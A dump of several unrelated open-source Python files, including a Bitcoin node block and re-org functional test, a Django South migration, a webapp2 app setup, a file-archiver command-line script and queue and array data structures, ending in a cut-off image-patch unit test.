# updated. (Perhaps to spend to a P2SH OP_TRUE script)
self.log.info("Test transaction resurrection during a re-org")
self.move_tip(76)
b77 = self.next_block(77)
tx77 = self.create_and_sign_transaction(out[24], 10 * COIN)
b77 = self.update_block(77, [tx77])
self.sync_blocks([b77], True)
self.save_spendable_output()
b78 = self.next_block(78)
tx78 = self.create_tx(tx77, 0, 9 * COIN)
b78 = self.update_block(78, [tx78])
self.sync_blocks([b78], True)
b79 = self.next_block(79)
tx79 = self.create_tx(tx78, 0, 8 * COIN)
b79 = self.update_block(79, [tx79])
self.sync_blocks([b79], True)
# mempool should be empty
assert_equal(len(self.nodes[0].getrawmempool()), 0)
self.move_tip(77)
b80 = self.next_block(80, spend=out[25])
self.sync_blocks([b80], False, request_block=False)
self.save_spendable_output()
b81 = self.next_block(81, spend=out[26])
self.sync_blocks([b81], False, request_block=False) # other chain is same length
self.save_spendable_output()
b82 = self.next_block(82, spend=out[27])
self.sync_blocks([b82], True) # now this chain is longer, triggers re-org
self.save_spendable_output()
# now check that tx78 and tx79 have been put back into the peer's mempool
mempool = self.nodes[0].getrawmempool()
assert_equal(len(mempool), 2)
assert(tx78.hash in mempool)
assert(tx79.hash in mempool)
# Test invalid opcodes in dead execution paths.
#
# -> b81 (26) -> b82 (27) -> b83 (28)
#
self.log.info("Accept a block with invalid opcodes in dead execution paths")
b83 = self.next_block(83)
op_codes = [OP_IF, OP_INVALIDOPCODE, OP_ELSE, OP_TRUE, OP_ENDIF]
script = CScript(op_codes)
tx1 = self.create_and_sign_transaction(out[28], out[28].vout[0].nValue, script)
tx2 = self.create_and_sign_transaction(tx1, 0, CScript([OP_TRUE]))
tx2.vin[0].scriptSig = CScript([OP_FALSE])
tx2.rehash()
b83 = self.update_block(83, [tx1, tx2])
self.sync_blocks([b83], True)
self.save_spendable_output()
# Reorg on/off blocks that have OP_RETURN in them (and try to spend them)
#
# -> b81 (26) -> b82 (27) -> b83 (28) -> b84 (29) -> b87 (30) -> b88 (31)
# \-> b85 (29) -> b86 (30) \-> b89a (32)
#
self.log.info("Test re-orging blocks with OP_RETURN in them")
b84 = self.next_block(84)
tx1 = self.create_tx(out[29], 0, 0, CScript([OP_RETURN]))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.calc_sha256()
self.sign_tx(tx1, out[29])
tx1.rehash()
tx2 = self.create_tx(tx1, 1, 0, CScript([OP_RETURN]))
tx2.vout.append(CTxOut(0, CScript([OP_RETURN])))
tx3 = self.create_tx(tx1, 2, 0, CScript([OP_RETURN]))
tx3.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx4 = self.create_tx(tx1, 3, 0, CScript([OP_TRUE]))
tx4.vout.append(CTxOut(0, CScript([OP_RETURN])))
tx5 = self.create_tx(tx1, 4, 0, CScript([OP_RETURN]))
b84 = self.update_block(84, [tx1, tx2, tx3, tx4, tx5])
self.sync_blocks([b84], True)
self.save_spendable_output()
self.move_tip(83)
b85 = self.next_block(85, spend=out[29])
self.sync_blocks([b85], False) # other chain is same length
b86 = self.next_block(86, spend=out[30])
self.sync_blocks([b86], True)
self.move_tip(84)
b87 = self.next_block(87, spend=out[30])
self.sync_blocks([b87], False) # other chain is same length
self.save_spendable_output()
b88 = self.next_block(88, spend=out[31])
self.sync_blocks([b88], True)
self.save_spendable_output()
# trying to spend the OP_RETURN output is rejected
b89a = self.next_block("89a", spend=out[32])
tx = self.create_tx(tx1, 0, 0, CScript([OP_TRUE]))
b89a = self.update_block("89a", [tx])
self.sync_blocks([b89a], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
self.log.info("Test a re-org of one week's worth of blocks (1088 blocks)")
self.move_tip(88)
LARGE_REORG_SIZE = 1088
blocks = []
spend = out[32]
for i in range(89, LARGE_REORG_SIZE + 89):
b = self.next_block(i, spend)
tx = CTransaction()
script_length = MAX_BLOCK_BASE_SIZE - len(b.serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b.vtx[1].sha256, 0)))
b = self.update_block(i, [tx])
assert_equal(len(b.serialize()), MAX_BLOCK_BASE_SIZE)
blocks.append(b)
self.save_spendable_output()
spend = self.get_spendable_output()
self.sync_blocks(blocks, True, timeout=180)
chain1_tip = i
# now create alt chain of same length
self.move_tip(88)
blocks2 = []
for i in range(89, LARGE_REORG_SIZE + 89):
blocks2.append(self.next_block("alt" + str(i)))
self.sync_blocks(blocks2, False, request_block=False)
# extend alt chain to trigger re-org
block = self.next_block("alt" + str(chain1_tip + 1))
self.sync_blocks([block], True, timeout=180)
# ... and re-org back to the first chain
self.move_tip(chain1_tip)
block = self.next_block(chain1_tip + 1)
self.sync_blocks([block], False, request_block=False)
block = self.next_block(chain1_tip + 2)
self.sync_blocks([block], True, timeout=180)
# Helper methods
################
def add_transactions_to_block(self, block, tx_list):
[tx.rehash() for tx in tx_list]
block.vtx.extend(tx_list)
# this is a little handier to use than the version in blocktools.py
def create_tx(self, spend_tx, n, value, script=CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])):
return create_tx_with_script(spend_tx, n, amount=value, script_pub_key=script)
# sign a transaction, using the key we know about
# this signs input 0 in tx, which is assumed to be spending output n in spend_tx
def sign_tx(self, tx, spend_tx):
scriptPubKey = bytearray(spend_tx.vout[0].scriptPubKey)
if (scriptPubKey[0] == OP_TRUE): # an anyone-can-spend
tx.vin[0].scriptSig = CScript()
return
(sighash, err) = SignatureHash(spend_tx.vout[0].scriptPubKey, tx, 0, SIGHASH_ALL)
tx.vin[0].scriptSig = CScript([self.coinbase_key.sign(sighash) + bytes(bytearray([SIGHASH_ALL]))])
def create_and_sign_transaction(self, spend_tx, value, script=CScript([OP_TRUE])):
tx = self.create_tx(spend_tx, 0, value, script)
self.sign_tx(tx, spend_tx)
tx.rehash()
return tx
def next_block(self, number, spend=None, additional_coinbase_value=0, script=CScript([OP_TRUE]), solve=True):
if self.tip is None:
base_block_hash = self.genesis_hash
block_time = int(time.time()) + 1
else:
base_block_hash = self.tip.sha256
block_time = self.tip.nTime + 1
# First create the coinbase
height = self.block_heights[base_block_hash] + 1
coinbase = create_coinbase(height, self.coinbase_pubkey)
coinbase.vout[0].nValue += additional_coinbase_value
coinbase.rehash()
if spend is None:
block = create_block(base_block_hash, coinbase, block_time)
else:
coinbase.vout[0].nValue += spend.vout[0].nValue - 1 # all but one satoshi to fees
coinbase.rehash()
block = create_block(base_block_hash, coinbase, block_time)
tx = self.create_tx(spend, 0, 1, script) # spend 1 satoshi
self.sign_tx(tx, spend)
self.add_transactions_to_block(block, [tx])
block.hashMerkleRoot = block.calc_merkle_root()
if solve:
block.solve()
self.tip = block
self.block_heights[block.sha256] = height
assert number not in self.blocks
self.blocks[number] = block
return block
# save the current tip so it can be spent by a later block
def save_spendable_output(self):
self.log.debug("saving spendable output %s" % self.tip.vtx[0])
self.spendable_outputs.append(self.tip)
# get an output that we previously marked as spendable
def get_spendable_output(self):
self.log.debug("getting spendable output %s" % self.spendable_outputs[0].vtx[0])
return self.spendable_outputs.pop(0).vtx[0]
# move the tip back to a previous block
def move_tip(self, number):
self.tip = self.blocks[number]
# adds transactions to the block and updates state
def update_block(self, block_number, new_transactions):
block = self.blocks[block_number]
self.add_transactions_to_block(block, new_transactions)
old_sha256 = block.sha256
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
# Update the internal state just like in next_block
self.tip = block
if block.sha256 != old_sha256:
self.block_heights[block.sha256] = self.block_heights[old_sha256]
del self.block_heights[old_sha256]
self.blocks[block_number] = block
return block
def bootstrap_p2p(self):
"""Add a P2P connection to the node.
Helper to connect and wait for version handshake."""
self.nodes[0].add_p2p_connection(P2PDataStore())
# We need to wait for the initial getheaders from the peer before we
# start populating our blockstore. If we don't, then we may run ahead
# to the next subtest before we receive the getheaders. We'd then send
# an INV for the next block and receive two getheaders - one for the
# IBD and one for the INV. We'd respond to both and could get
# unexpectedly disconnected if the DoS score for that error is 50.
self.nodes[0].p2p.wait_for_getheaders(timeout=5)
def reconnect_p2p(self):
"""Tear down and bootstrap the P2P connection to the node.
The node gets disconnected several times in this test. This helper
method reconnects the p2p and restarts the network thread."""
self.nodes[0].disconnect_p2ps()
self.bootstrap_p2p()
def sync_blocks(self, blocks, success=True, reject_code=None, reject_reason=None, request_block=True, reconnect=False, timeout=60):
"""Sends blocks to test node. Syncs and verifies that tip has advanced to most recent block.
Call with success = False if the tip shouldn't advance to the most recent block."""
self.nodes[0].p2p.send_blocks_and_test(blocks, self.nodes[0], success=success, reject_code=reject_code, reject_reason=reject_reason, request_block=request_block, timeout=timeout)
if reconnect:
self.reconnect_p2p()
if __name__ == '__main__':
FullBlockTest().main()
|
atizo/braindump
|
brainstorming/migrations/0005_auto__add_field_idea_color.py
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Idea.color'
db.add_column(u'brainstorming_idea', 'color',
self.gf('django.db.models.fields.CharField')(default='', max_length=100, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Idea.color'
db.delete_column(u'brainstorming_idea', 'color')
models = {
u'brainstorming.brainstorming': {
'Meta': {'ordering': "['-created']", 'object_name': 'Brainstorming'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'creator_ip': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'brainstorming.brainstormingwatcher': {
'Meta': {'ordering': "['-created']", 'unique_together': "(('brainstorming', 'email'),)", 'object_name': 'BrainstormingWatcher'},
'brainstorming': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brainstorming.Brainstorming']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'})
},
u'brainstorming.emailverification': {
'Meta': {'ordering': "['-created']", 'object_name': 'EmailVerification'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'})
},
u'brainstorming.idea': {
'Meta': {'ordering': "['-created']", 'object_name': 'Idea'},
'brainstorming': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brainstorming.Brainstorming']"}),
'color': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator_ip': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'creator_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'ratings': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'text': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'})
}
}
complete_apps = ['brainstorming']
|
onejgordon/action-potential
|
actionpotential.py
|
import os
import webapp2
from actions import cronActions
from views import views
import secrets
SECS_PER_WEEK = 60 * 60 * 24 * 7
# Enable ctypes -> Jinja2 tracebacks
PRODUCTION_MODE = not os.environ.get(
'SERVER_SOFTWARE', 'Development').startswith('Development')
ROOT_DIRECTORY = os.path.dirname(__file__)
if not PRODUCTION_MODE:
from google.appengine.tools.devappserver2.python import sandbox
sandbox._WHITE_LIST_C_MODULES += ['_ctypes', 'gestalt']
TEMPLATE_DIRECTORY = os.path.join(ROOT_DIRECTORY, 'src')
else:
TEMPLATE_DIRECTORY = os.path.join(ROOT_DIRECTORY, 'dist')
curr_path = os.path.abspath(os.path.dirname(__file__))
config = {
'webapp2_extras.sessions': {
'secret_key': secrets.COOKIE_KEY,
'session_max_age': SECS_PER_WEEK,
'cookie_args': {'max_age': SECS_PER_WEEK},
'cookie_name': 'echo_sense_session'
},
'webapp2_extras.jinja2': {
'template_path': TEMPLATE_DIRECTORY
}
}
app = webapp2.WSGIApplication(
[
# Cron jobs (see cron.yaml)
webapp2.Route('/cron/monthly', handler=cronActions.Monthly),
webapp2.Route(r'/<:.*>', handler=views.ActionPotentialApp, name="ActionPotentialApp"),
], debug=True, config=config)
|
jdthorpe/archiver
|
__main__.py
|
# this is the interface for `python archiver`
import archiver
import appdirs
import os
import sys
import pickle
import json
from archiver.archiver import Archiver
from archiver.parser import parseArgs
args = parseArgs()
from edit import edit
# ==============================================
print args
# TODO: see http://stackoverflow.com/questions/13168083/python-raw-input-replacement-that-uses-a-configurable-text-editor
#-- import pdb
#-- pdb.set_trace()
# ------------------------------------------------------------
# load the user data
# ------------------------------------------------------------
# get the user data directory
user_data_dir = appdirs.user_data_dir('FileArchiver', 'jdthorpe')
if not os.path.exists(user_data_dir) :
os.makedirs(user_data_dir)
# LOAD THE INDEX NAMES AND ACTIVE INDEX
indexes_path = os.path.join(user_data_dir,'INDEXES.json')
if os.path.exists(indexes_path):
with open(indexes_path,'rb') as fh:
indexes = json.load(fh)
else:
indexes= {'active':None,'names':[]}
if not os.path.exists(user_data_dir):
os.makedirs(user_data_dir)
def dumpIndexes():
with open(indexes_path,'wb') as fh:
json.dump(indexes,fh)
# ------------------------------------------------------------
# ------------------------------------------------------------
def getActiveName():
# ACTIVE INDEX NUMER
activeIndex = indexes['active']
if activeIndex is None:
print "No active index. Use 'list -i' to list available indexies and 'use' to set an active index."
sys.exit()
# GET THE NAME OF THE INDEX
try:
activeIndexName = indexes['names'][indexes['active']]
except:
print "Invalid index number"
sys.exit()
return activeIndexName
# ------------------------------------------------------------
# READ-WRITE UTILITY FUNCTIONS
# ------------------------------------------------------------
# TODO: catch specific excepitons:
# except IOError:
# # no such file
# except ValueError as e:
# # invalid json file
def readSettings(name):
""" A utility function which loads the index settings from file
"""
try:
with open(os.path.join(user_data_dir,name+".settings"),'rb') as fh:
settings = json.load(fh)
except Exception as e:
print "Error reading index settings"
import pdb
pdb.set_trace()
sys.exit()
return settings
def readData(name):
""" A utility function which loads the index data from file
"""
try:
with open(os.path.join(user_data_dir,name+".data"),'rb') as fh: data = pickle.load(fh)
except Exception as e:
print "Error reading index data"
import pdb
pdb.set_trace()
sys.exit()
return data
def dumpSettings(settings,name):
""" A utility function which saves the index settings to file
"""
try:
with open(os.path.join(user_data_dir,name+".settings"),'wb') as fh:
json.dump(settings,fh)
except Exception as e:
print "Error writing index settings"
import pdb
pdb.set_trace()
sys.exit()
def dumpData(data,name):
""" A utility function which saves the index settings to file
"""
try:
with open(os.path.join(user_data_dir,name+".data"),'wb') as fh:
pickle.dump(data,fh)
except:
print "Error writing index data"
import pdb
pdb.set_trace()
sys.exit()
# ------------------------------------------------------------
# ------------------------------------------------------------
if args.command == 'add':
activeName = getActiveName()
settings = readSettings(activeName)
if args.source is not None:
source = os.path.abspath(args.source)
if not os.path.exists(source):
print 'WARNING: no such directory "%s"'%(source)
elif not os.path.isdir(source):
print 'ERROR: "%s" is not a directory'%(source)
sys.exit()
print 'Adding source directory: %s'%(source)
if not any(samefile(source,f) for f in settings['sourceDirectories']):
settings['sourceDirectories'].append(source)
elif args.exclusions is not None:
import re
try:
re.compile(args.exclusion)
except re.error:
print 'Invalid regular expression "%s"'%(args.exclusion)
sys.exit()
if args.noic:
settings['directoryExclusionPatterns'].append(args.exclusion)
else:
settings['directoryExclusionPatterns'].append((args.exclusion,2)) # re.I == 2
elif args.archive is not None:
raise NotImplementedError
if settings['archiveDirectory'] is not None:
print "Archive path has already been set use 'remove' to delete the archive path before setting a new archive path"
archiveDirectory = os.path.abspath(args.archive)
if not os.path.exists(archiveDirectory):
if args.create :
os.makedirs(archiveDirectory)
else:
print 'ERROR: no such directory "%s"'%(archiveDirectory)
sys.exit()
elif not os.path.isdir(archiveDirectory):
print '"%s" is not a directory'%(archiveDirectory)
sys.exit()
print 'Setting archive directory to: %s'%(archiveDirectory)
settings['archiveDirectory'] = args.archive
else:
raise NotImplementedError
print 'Error in Arg Parser'
sys.exit()
dumpSettings(settings,activeName)
elif args.command == 'list':
if args.sources:
for f in readSettings(getActiveName())['sourceDirectories']:
print f
elif args.exclusions:
for f in readSettings(getActiveName())['directoryExclusionPatterns']:
print f
elif args.archive:
print readSettings(getActiveName())['archiveDirectory']
elif args.files:
archiver = Archiver()
archiver.data = readData(getActiveName())
for f in archiver:
print f
elif args.indexes:
print 'Active Index: %s (*)'%(getActiveName())
print 'Index Names: '
for i,name in enumerate(indexes['names']):
print ' %s %i: %s'%(
(' ','*')[(i == indexes['active'])+0],
i+1,
name,
)
else:
print 'Error in Arg Parser'
elif args.command == 'remove':
activeName = getActiveName()
settings = readSettings(activeName)
if args.source is not None:
if not (1 <= args.source <= len(settings['sourceDirectories'])):
print 'Invalid index %i'%(args.source)
del settings['sourceDirectories'][args.source - 1]
elif args.exclusion is not None:
raise NotImplementedError
if not (1 <= args.exclusion <= len(settings['directoryExclusionPatterns'])):
print 'Invalid index %i'%(args.exclusion)
del settings['directoryExclusionPatterns'][args.exclusion - 1]
elif args.archive is not None:
raise NotImplementedError
settings['archiveDirectory'] = None
else:
raise NotImplementedError
print 'Error in Arg Parser'
sys.exit()
dumpSettings(settings,activeName)
elif args.command == 'update':
activeName = getActiveName()
settings = readSettings(activeName)
if not len(settings['sourceDirectories']):
print "Error: no source directories in the active index. Please add a source directory via 'add -s'"
archiver = Archiver(
settings = readSettings(activeName),
data = readData(activeName))
archiver.update()
dumpSettings(archiver.settings,activeName)
dumpData(archiver.data,activeName)
elif args.command == 'clean':
raise NotImplementedError
activeName = getActiveName()
archiver = Archiver(
settings = readSettings(activeName),
data = readData(activeName))
archiver.clean()
dumpSettings(archiver.settings,activeName)
dumpData(archiver.data,activeName)
elif args.command == 'copy':
raise NotImplementedError
activeName = getActiveName()
settings = readSettings(activeName),
if settings['archiveDirectory'] is None:
print "ERROR Archive directory not set. Use 'add -a' to set the archive directory."
sys.exit()
Index(
settings = settings,
data = readData(activeName)).copy()
elif args.command == 'diskimages':
raise NotImplementedError
if args.size is None or args.size == "DVD":
size = 4.65*1<<20
elif args.size == "CD":
size = 645*1<<20
elif args.size == "DVD":
size = 4.65*1<<20
elif args.size == "DVD-dual":
size = 8.5*1<<30
elif args.size == "BD":
size = 25*1<<30
elif args.size == "BD-dual":
size = 50*1<<30
elif args.size == "BD-tripple":
size = 75*1<<30
elif args.size == "BD-xl":
size = 100*1<<30
else:
try:
size = int(float(args.size))
except:
print 'ERROR: unable to coerce "%s" to float or int'%(args.size)
sys.exit()
activeName = getActiveName()
settings = readSettings(activeName),
# GET THE DIRECTORY ARGUMENT
if args.directory is not None:
directory = args.directory
else:
if settings['archiveDirectory'] is None:
print "ERROR Archive directory not set and no directory specified. Use 'diskimages -d' to specifiy the disk image directory or 'add -a' to set the archive directory."
sys.exit()
else:
directory = os.path.join(settings['archiveDirectory'],'Disk Images')
# VALIDATE THE DIRECTORY
if not os.path.exists(directory):
if args.create :
os.makedirs(directory)
else:
print 'ERROR: no such directory "%s"'%(directory)
sys.exit()
elif not os.path.isdir(directory):
print '"%s" is not a directory'%(directory)
sys.exit()
# get the FPBF argument
if args.fpbf is not None:
FPBF = True
elif args.nofpbf is not None:
FPBF = False
else:
FPBF = sys.platform == 'darwin'
Index( settings = settings,
data = readData(activeName)).diskimages(directory,size,FPBF)
elif args.command == 'settings':
activeName = getActiveName()
if args.export is not None:
raise NotImplementedError
with open(args.export,'rb') as fh:
json.dump(readSettings(activeName),fh,indent=2,separators=(',', ': '))
elif args.load is not None:
raise NotImplementedError
with open(args.export,'wb') as fh:
settings = json.load(fh)
# give a chance for the settings to be validated
try:
archiver = Archiver(settings=settings)
except:
print "ERROR: invalid settings file"
dumpSettings(archiver.settings,args.name)
elif args.edit is not None:
settings = readSettings(activeName)
old = settings['identifierSettings'][args.edit]
new = edit(json.dumps(old,indent=2,separators=(',', ': ')))
settings['identifierSettings'][args.edit]= json.loads(new)
dumpSettings(settings,activeName)
else :
print json.dumps(readSettings(activeName),indent=2,separators=(',', ': '))
elif args.command == 'create':
if args.name in indexes['names']:
print "An index by the name '%s' already exists"%(args.name)
sys.exit()
import re
validater = re.compile(r'^[-() _a-zA-Z0-9](?:[-() _.a-zA-Z0-9]+[-() _a-zA-Z0-9])$')
if validater.match(args.name) is None:
print "ERROR: names must be composed of letters, numbers, hypen, underscore, space and dot charactes an not end or begin with a dot"
sys.exit()
archiver = Index()
dumpSettings(archiver.settings,args.name)
dumpData(archiver.data,args.name)
indexes['names'].append(args.name)
dumpIndexes()
# TODO: check if there are no other indexies. if so, make the new one active.
print "Created index '%s'"%(args.name)
elif args.command == 'save':
raise NotImplementedError
Index( settings = readSettings(getActiveName()),
data = readData(getActiveName())).save(args.filename)
elif args.command == 'use':
print indexes['names']
if not args.name in indexes['names']:
print "ERROR: No such index named '%s'"%(args.name)
sys.exit()
indexes['active'] =indexes['names'].index(args.name)
dumpIndexes()
elif args.command == 'delete':
if not args.name in indexes['names']:
print "ERROR: No such index named '%s'"%(args.name)
sys.exit()
nameIindex = indexes['names'].index(args.name)
if indexes['active'] == nameIindex:
print 'WARNING: deleting active index'
indexes['active'] = None
del indexes['names'][nameIindex]
dumpIndexes()
else :
print "unknown command %s"%(args.command)
|
evenmarbles/mlpy
|
mlpy/auxiliary/datastructs.py
|
"""
.. module:: mlpy.auxiliary.datastructs
:platform: Unix, Windows
:synopsis: Provides data structure implementations.
.. moduleauthor:: Astrid Jackson <ajackson@eecs.ucf.edu>
"""
from __future__ import division, print_function, absolute_import
import heapq
import numpy as np
from abc import ABCMeta, abstractmethod
class Array(object):
"""The managed array class.
The managed array class pre-allocates memory to the given size
automatically resizing as needed.
Parameters
----------
size : int
The size of the array.
Examples
--------
>>> a = Array(5)
>>> a[0] = 3
>>> a[1] = 6
Retrieving an elements:
>>> a[0]
3
>>> a[2]
0
Finding the length of the array:
>>> len(a)
2
"""
def __init__(self, size):
self._data = np.zeros((size,))
self._capacity = size
self._size = 0
def __setitem__(self, index, value):
"""Set the the array at the index to the given value.
Parameters
----------
index : int
The index into the array.
value :
The value to set the array to.
"""
if index >= self._size:
if self._size == self._capacity:
self._capacity *= 2
new_data = np.zeros((self._capacity,))
new_data[:self._size] = self._data
self._data = new_data
self._size += 1
self._data[index] = value
def __getitem__(self, index):
"""Get the value at the given index.
Parameters
----------
index : int
The index into the array.
"""
return self._data[index]
def __len__(self):
"""The length of the array.
Returns
-------
int :
The size of the array
"""
return self._size
class Point2D(object):
"""The 2d-point class.
The 2d-point class is a container for positions
in a 2d-coordinate system.
Parameters
----------
x : float, optional
The x-position in a 2d-coordinate system. Default is 0.0.
y : float, optional
The y-position in a 2d-coordinate system. Default is 0.0.
Attributes
----------
x : float
The x-position in a 2d-coordinate system.
y : float
The y-position in a 2d-coordinate system.
"""
__slots__ = ['x', 'y']
def __init__(self, x=0.0, y=0.0):
self.x = x
self.y = y
class Point3D(object):
"""
The 3d-point class.
The 3d-point class is a container for positions
in a 3d-coordinate system.
Parameters
----------
x : float, optional
The x-position in a 2d-coordinate system. Default is 0.0.
y : float, optional
The y-position in a 2d-coordinate system. Default is 0.0.
z : float, optional
The z-position in a 3d-coordinate system. Default is 0.0.
Attributes
----------
x : float
The x-position in a 2d-coordinate system.
y : float
The y-position in a 2d-coordinate system.
z : float
The z-position in a 3d-coordinate system.
"""
__slots__ = ['x', 'y', 'z']
def __init__(self, x=0.0, y=0.0, z=0.0):
self.x = x
self.y = y
self.z = z
class Vector3D(Point3D):
"""The 3d-vector class.
.. todo::
Implement vector functionality.
Parameters
----------
x : float, optional
The x-position in a 2d-coordinate system. Default is 0.0.
y : float, optional
The y-position in a 2d-coordinate system. Default is 0.0.
z : float, optional
The z-position in a 3d-coordinate system. Default is 0.0.
Attributes
----------
x : float
The x-position in a 2d-coordinate system.
y : float
The y-position in a 2d-coordinate system.
z : float
The z-position in a 3d-coordinate system.
"""
def __init__(self, x=0.0, y=0.0, z=0.0):
super(Vector3D, self).__init__(x, y, z)
class Queue(object):
"""The abstract queue base class.
The queue class handles core functionality common for
any type of queue. All queues inherit from the queue
base class.
See Also
--------
:class:`FIFOQueue`, :class:`PriorityQueue`
"""
__metaclass__ = ABCMeta
def __init__(self):
self._queue = []
def __len__(self):
return len(self._queue)
def __contains__(self, item):
try:
self._queue.index(item)
return True
except Exception:
return False
def __iter__(self):
return iter(self._queue)
def __str__(self):
return '[' + ', '.join('{}'.format(el) for el in self._queue) + ']'
def __repr__(self):
return ', '.join('{}'.format(el) for el in self._queue)
@abstractmethod
def push(self, item):
"""Push a new element on the queue
Parameters
----------
item :
The element to push on the queue
"""
raise NotImplementedError
@abstractmethod
def pop(self):
"""Pop an element from the queue."""
raise NotImplementedError
def empty(self):
"""Check if the queue is empty.
Returns
-------
bool :
Whether the queue is empty.
"""
return len(self._queue) <= 0
def extend(self, items):
"""Extend the queue by a number of elements.
Parameters
----------
items : list
A list of items.
"""
for item in items:
self.push(item)
def get(self, item):
"""Return the element in the queue identical to `item`.
Parameters
----------
item :
The element to search for.
Returns
-------
The element in the queue identical to `item`. If the element
was not found, None is returned.
"""
try:
index = self._queue.index(item)
return self._queue[index]
except Exception:
return None
def remove(self, item):
"""Remove an element from the queue.
Parameters
----------
item :
The element to remove.
"""
self._queue.remove(item)
class FIFOQueue(Queue):
"""The first-in-first-out (FIFO) queue.
In a FIFO queue the first element added to the queue
is the first element to be removed.
Examples
--------
>>> q = FIFOQueue()
>>> q.push(5)
>>> q.extend([1, 3, 7])
>>> print q
[5, 1, 3, 7]
Retrieving an element:
>>> q.pop()
5
Removing an element:
>>> q.remove(3)
>>> print q
[1, 7]
Get the element in the queue identical to the given item:
>>> q.get(7)
7
Check if the queue is empty:
>>> q.empty()
False
Loop over the elements in the queue:
>>> for x in q:
>>> print x
1
7
Check if an element is in the queue:
>>> if 7 in q:
>>> print "yes"
yes
See Also
--------
:class:`PriorityQueue`
"""
def __init__(self):
super(FIFOQueue, self).__init__()
def push(self, item):
"""Push an element to the end of the queue.
Parameters
----------
item :
The element to append.
"""
self._queue.append(item)
def pop(self):
"""Return the element at the front of the queue.
Returns
-------
The first element in the queue.
"""
return self._queue.pop(0)
def extend(self, items):
"""Append a list of elements at the end of the queue.
Parameters
----------
items : list
List of elements.
"""
self._queue.extend(items)
class PriorityQueue(Queue):
"""
The priority queue.
In a priority queue each element has a priority associated with it. An element
with high priority (i.e., smallest value) is served before an element with low priority
(i.e., largest value). The priority queue is implemented with a heap.
Parameters
----------
func : callable
A callback function handling the priority. By default the priority
is the value of the element.
Examples
--------
>>> q = PriorityQueue()
>>> q.push(5)
>>> q.extend([1, 3, 7])
>>> print q
[(1,1), (5,5), (3,3), (7,7)]
Retrieving the element with highest priority:
>>> q.pop()
1
Removing an element:
>>> q.remove((3, 3))
>>> print q
[(5,5), (7,7)]
Get the element in the queue identical to the given item:
>>> q.get(7)
7
Check if the queue is empty:
>>> q.empty()
False
Loop over the elements in the queue:
>>> for x in q:
>>> print x
(5, 5)
(7, 7)
Check if an element is in the queue:
>>> if 7 in q:
>>> print "yes"
yes
See Also
--------
:class:`FIFOQueue`
"""
def __init__(self, func=lambda x: x):
super(PriorityQueue, self).__init__()
self.func = func
def __contains__(self, item):
for _, element in self._queue:
if item == element:
return True
return False
def __str__(self):
return '[' + ', '.join('({},{})'.format(*el) for el in self._queue) + ']'
def push(self, item):
"""Push an element on the priority queue.
The element is pushed on the priority queue according
to its priority.
Parameters
----------
item :
The element to push on the queue.
"""
heapq.heappush(self._queue, (self.func(item), item))
def pop(self):
"""Get the element with the highest priority.
Get the element with the highest priority (i.e., smallest value).
Returns
-------
The element with the highest priority.
"""
return heapq.heappop(self._queue)[1]
def get(self, item):
"""Return the element in the queue identical to `item`.
Parameters
----------
item :
The element to search for.
Returns
-------
The element in the queue identical to `item`. If the element
was not found, None is returned.
"""
for _, element in self._queue:
if item == element:
return element
return None
def remove(self, item):
"""Remove an element from the queue.
Parameters
----------
item :
The element to remove.
"""
super(PriorityQueue, self).remove(item)
heapq.heapify(self._queue)
|
ctgk/BayesianNetwork
|
test/image/test_util.py
|
import unittest
import numpy as np
from bayesnet.image.util import img2patch, patch2img
class TestImg2Patch(unittest.TestCase):
def test_img2patch(self):
img = np.arange(16).reshape(1, 4, 4, 1)
patch = img2patch(img, size=3, step=1)
expected = np.asarray([
[img[0, 0:3, 0:3, 0], img[0, 0:3, 1:4, 0]],
[img[0, 1:4, 0:3, 0], img[0, 1:4, 1:4, 0]]
])
expected = expected[None, ..., None]
self.assertTrue((patch == expected).all())
imgs = [
